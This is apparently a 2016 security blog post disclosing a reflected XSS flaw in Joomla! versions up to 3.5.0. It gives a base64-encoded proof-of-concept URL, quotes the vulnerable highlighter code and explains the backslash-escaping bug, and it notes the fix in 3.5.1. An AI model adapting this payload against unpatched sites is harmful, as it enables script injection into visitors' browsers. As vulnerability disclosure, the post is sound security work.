jeffchannell.com

Joomla! 2.5.x/3.5.0 XSS

Posted in Joomla!
2016-06-06 07:06:05 +0000 UTC

Joomla! versions before 3.5.0, including the 2.5.x series (likely all the way back to 1.6.0, no regression testing done) are vulnerable to reflective XSS:

Joomla! 3.5.0 Reflective XSS
============================

http://[joomla site]/index.php?option=com_finder&highlight=WyJcXCIsIl0pO2FsZXJ0KDEpO1wvXC9cXCJd

Decoded payload: ["\\\\","]);alert(1);\\/\\/\\\\"]

How it works: the highlight plugin decodes the payload from base64 then from JSON,
then iterates over the resulting array and attempts to clean each entry before
passing to the "highlighter" behavior.

The highlighter behavior code "escapes" double quotes by replacing them with \\",
however it fails to take into account any preceding backslashes. This allows
the payload to break out of the resulting imploded string and execute code.

plugins/system/highlight/highlight.php

                // Get the terms to highlight from the request.
                $terms = $input->request->get('highlight', null, 'base64');
                $terms = $terms ? json_decode(base64_decode($terms)) : null;

                // Check the terms.
                if (empty($terms))
                {
                        return true;
                }

                // Clean the terms array.
                $filter = JFilterInput::getInstance();

                $cleanTerms = array();

                foreach ($terms as $term)
                {
                        $cleanTerms[] = htmlspecialchars($filter->clean($term, 'string'));
                }

                // Activate the highlighter.
                JHtml::_('behavior.highlighter', $cleanTerms);


libraries/cms/html/behavior.php

                $terms = str_replace('"', '\\"', $terms);

                $document = JFactory::getDocument();
                $document->addScriptDeclaration("
                        jQuery(function ($) {
                                var start = document.getElementById('" . $start . "');
                                var end = document.getElementById('" . $end . "');
                                if (!start || !end || !Joomla.Highlighter) {
                                        return true;
                                }
                                highlighter = new Joomla.Highlighter({
                                        startElement: start,
                                        endElement: end,
                                        className: '" . $className . "',
                                        onlyWords: false,
                                        tag: '" . $tag . "'
                                }).highlight([\\"" . implode('","', $terms) . "\\"]);
                                $(start).remove();
                                $(end).remove();
                        });
                ");

a href="https://github.com/joomla/joomla-cms/pull/9524" target="_blank">Fixed in 3.5.1